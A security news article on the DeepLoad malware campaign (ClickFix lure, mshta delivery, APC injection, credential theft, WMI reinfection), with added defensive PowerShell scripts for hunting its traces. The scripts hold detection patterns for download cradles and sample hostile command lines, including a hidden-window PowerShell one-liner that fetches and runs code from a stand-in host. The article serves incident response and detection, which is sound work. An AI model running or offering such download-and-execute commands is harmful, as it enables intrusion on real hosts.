DeepLoad malware uses ClickFix lure and WMI to spread and steal credentials

A new malware campaign is using the ClickFix social engineering tactic to distribute a previously undocumented loader called DeepLoad, according to a technical analysis from ReliaQuest. The activity includes credential theft, browser extension abuse and reinfection through Windows Management Instrumentation (WMI), with researchers saying the loader re-executed on a cleaned host three days later without anyone touching it.

KEY FACTS

  • Delivery: Users are tricked into pasting PowerShell commands into the Windows Run dialog through a ClickFix lure.
  • Loader behavior: The malware uses mshta.exe, obfuscation, PowerShell history removal and APC injection.
  • Data theft: DeepLoad targets browser passwords and drops a malicious extension that captures login credentials.
  • Spread: It can copy itself to removable media using fake installer file names and later reinfect hosts through WMI.

The report says the initial stage uses a legitimate Windows utility, mshta.exe, to download and run an obfuscated PowerShell loader. The code hides its real function among meaningless variable assignments, and the researchers said the obfuscation layer appears to have been built with help from an AI tool.

DeepLoad also places its payload in a file named LockAppHost.exe, borrowing the name of the legitimate Windows lock-screen host process to blend in with normal activity. It compiles a temporary DLL with PowerShell's Add-Type feature, disables PowerShell command history and calls native Windows API functions directly through that DLL rather than through PowerShell cmdlets, which leaves less for cmdlet-level logging to capture.
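The delivery stage and the history wiping described above leave two host-side traces a responder can check quickly: the command the user actually pasted into the Run dialog, which Explorer records in the RunMRU registry key, and the state of the PSReadLine history file. The script below is an added example, not code from the ReliaQuest report; the heuristics it applies (mshta with a remote URL, hidden-window or encoded PowerShell, download cradles) and the sample command lines are the editor's own and are not indicators published with the campaign.

```powershell
# Added example, not code from the ReliaQuest report. Hunts for the host-side
# traces the delivery stage leaves: the pasted Run-dialog command (RunMRU) and
# a wiped PSReadLine history. Heuristics and sample commands are the editor's own.

function Test-ClickFixCommand {
    [CmdletBinding()]
    param([Parameter(Mandatory)][string]$CommandLine)

    $cl = $CommandLine.Trim()
    $reasons = [System.Collections.Generic.List[string]]::new()

    # First stage per the report: mshta.exe pulling a remote HTA/script.
    if ($cl -match '(?i)\bmshta(\.exe)?\b.*\b(https?|ftp):') { $reasons.Add('mshta with remote URL') }

    # Hallmarks of a pasted PowerShell one-liner.
    if ($cl -match '(?i)\b(powershell|pwsh)(\.exe)?\b') {
        if ($cl -match '(?i)\s-(e|ec|enc|encodedcommand)\s')     { $reasons.Add('encoded command') }
        if ($cl -match '(?i)\s-w(indowstyle)?\s+h(idden)?\b')     { $reasons.Add('hidden window') }
        if ($cl -match '(?i)\s-(ep|executionpolicy)\s+bypass\b')  { $reasons.Add('execution policy bypass') }
        if ($cl -match '(?i)\b(iex|invoke-expression)\b')         { $reasons.Add('invoke-expression') }
        if ($cl -match '(?i)\b(downloadstring|downloadfile|invoke-webrequest|iwr|invoke-restmethod|irm)\b') {
            $reasons.Add('download cradle')
        }
    }

    [pscustomobject]@{
        CommandLine = $CommandLine
        Suspicious  = $reasons.Count -gt 0
        Reasons     = $reasons -join '; '
    }
}

function Get-RunMruCommand {
    # Explorer records what the user typed into Win+R under RunMRU; each value
    # ends in a literal "\1" and MRUList gives most-recent-first order.
    $key = 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU'
    if (-not (Test-Path $key)) { return }
    $item = Get-ItemProperty -Path $key
    foreach ($ch in ([string]$item.MRUList).ToCharArray()) {
        $name = [string]$ch
        $val  = $item.$name
        if ($val) { $val -replace '\\1$', '' }
    }
}

function Get-PSReadLineHistoryStatus {
    # The report says DeepLoad turns off PowerShell history. An empty or missing
    # history file on a host with other evidence of interactive PowerShell use is
    # a weak signal worth correlating with process telemetry.
    if (-not $env:APPDATA) { return }
    $path = Join-Path $env:APPDATA 'Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt'
    $exists = Test-Path -LiteralPath $path
    [pscustomobject]@{
        Path   = $path
        Exists = $exists
        Lines  = if ($exists) { @(Get-Content -LiteralPath $path).Count } else { 0 }
    }
}

# Constructed sample command lines (editor's examples, not campaign indicators).
$samples = @(
    'notepad.exe',
    'mshta https://example.invalid/verify.hta',
    'powershell -w hidden -ep bypass -c "iex (iwr https://example.invalid/l)"'
)
$samples | ForEach-Object { Test-ClickFixCommand -CommandLine $_ } | Format-Table -AutoSize

# Live host: anything the user actually pasted into Win+R, plus history state.
if ([System.Environment]::OSVersion.Platform -eq 'Win32NT') {
    Get-RunMruCommand | ForEach-Object { Test-ClickFixCommand -CommandLine $_ } |
        Where-Object Suspicious | Format-Table -AutoSize
    Get-PSReadLineHistoryStatus | Format-List
}
```

RunMRU is per-user, so run this in the context of the user who was lured, or load that user's NTUSER.DAT hive first. The sample run flags the mshta and PowerShell lines and leaves notepad.exe alone; on a real host, treat any RunMRU entry that invokes mshta.exe or PowerShell as worth pulling the matching process-creation events for.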

The disclosure says the loader queues the decoded payload to a trusted Windows process with an asynchronous procedure call (APC), so it executes inside that process's memory without a decoded copy ever being written to disk. It also installs a malicious browser extension that intercepts credentials on login pages and persists across user sessions unless it is removed.

Researchers said the malware detects removable media and copies itself there as shortcut files named after common installers, such as ChromeSetup.lnk, Firefox Installer.lnk and AnyDesk.lnk. A separate section of the report notes that WMI was used to reinfect a cleaned host days later without any user action or attacker interaction.
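The report says WMI re-launched the loader days after cleanup but does not name the mechanism. The standard way to get delayed execution through WMI with no user or operator involvement is a permanent event subscription, which is an event filter, an event consumer and a binding between them stored in the root\subscription namespace, so enumerating those is the check to run on any host that was "cleaned" and came back. The script below is an added example, not code from the ReliaQuest report: the assumption that a permanent subscription is in play, the "Suspicious" heuristics, and the choice to search whole removable volumes for the three shortcut names the report quotes are all the editor's.

```powershell
# Added example, not code from the ReliaQuest report. Enumerates permanent WMI
# event subscriptions (the assumed reinfection mechanism; the report does not say)
# and looks for the removable-media shortcut names the report quotes.

function Get-WmiEventSubscription {
    [CmdletBinding()]
    param([string]$Namespace = 'root\subscription')

    $filters   = Get-CimInstance -Namespace $Namespace -ClassName __EventFilter
    $consumers = Get-CimInstance -Namespace $Namespace -ClassName __EventConsumer
    $bindings  = Get-CimInstance -Namespace $Namespace -ClassName __FilterToConsumerBinding

    foreach ($b in $bindings) {
        # Binding properties are references carrying the key (Name) of each side.
        $f = $filters   | Where-Object Name -eq $b.Filter.Name   | Select-Object -First 1
        $c = $consumers | Where-Object Name -eq $b.Consumer.Name | Select-Object -First 1
        $action = switch ($c.CimClass.CimClassName) {
            'CommandLineEventConsumer'  { "$($c.ExecutablePath) $($c.CommandLineTemplate)".Trim() }
            'ActiveScriptEventConsumer' { if ($c.ScriptFileName) { $c.ScriptFileName } else { $c.ScriptText } }
            default                     { '' }
        }
        [pscustomobject]@{
            Filter     = $f.Name
            Query      = $f.Query
            Consumer   = $c.Name
            Class      = $c.CimClass.CimClassName
            Action     = $action
            # Heuristic only: clock/timer triggers, volume-arrival triggers and
            # script-host or LOLBin actions are the usual shape of delayed re-execution.
            Suspicious = ($f.Query -match '(?i)Win32_LocalTime|__TimerEvent|Win32_VolumeChangeEvent|Win32_LogicalDisk') -or
                         ($action  -match '(?i)powershell|pwsh|mshta|wscript|cscript|cmd\.exe|rundll32|LockAppHost')
        }
    }
}

function Find-RemovableMediaLnk {
    # Shortcut names the report says DeepLoad uses when copying to removable media.
    $names = 'ChromeSetup.lnk', 'Firefox Installer.lnk', 'AnyDesk.lnk'
    $shell = New-Object -ComObject WScript.Shell
    Get-CimInstance -ClassName Win32_LogicalDisk | Where-Object DriveType -eq 2 | ForEach-Object {   # 2 = removable
        Get-ChildItem -Path "$($_.DeviceID)\" -Recurse -Filter '*.lnk' -Force -ErrorAction SilentlyContinue |
            Where-Object { $_.Name -in $names } | ForEach-Object {
                $lnk = $shell.CreateShortcut($_.FullName)   # resolve what the shortcut really launches
                [pscustomobject]@{ Path = $_.FullName; Target = $lnk.TargetPath; Arguments = $lnk.Arguments }
            }
    }
}

if ([System.Environment]::OSVersion.Platform -eq 'Win32NT') {
    # Windows ships one benign binding here (SCM Event Log Filter -> NTEventLogEventConsumer);
    # anything else deserves a look, especially rows flagged Suspicious.
    Get-WmiEventSubscription | Format-List
    Find-RemovableMediaLnk   | Format-Table -AutoSize
}
```

Run it elevated, since root\subscription is not readable by standard users. Removing a malicious subscription means deleting all three objects (binding, then consumer and filter); deleting only the dropped executable, as a "cleanup" that stops at the file, leaves the subscription in place to recreate it, which is consistent with the reinfection the report describes.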

WHY IT MATTERS

The campaign combines social engineering, credential theft and persistence in ways that let it survive basic defenses and spread across systems. Its reliance on built-in Windows tools and on delayed reinfection also makes detection harder for organizations that key alerts on process chains and dropped files: a process started by WMI is spawned from WmiPrvSE.exe, not from the browser or Explorer session where the infection began, and it can appear long after the original activity was triaged and closed.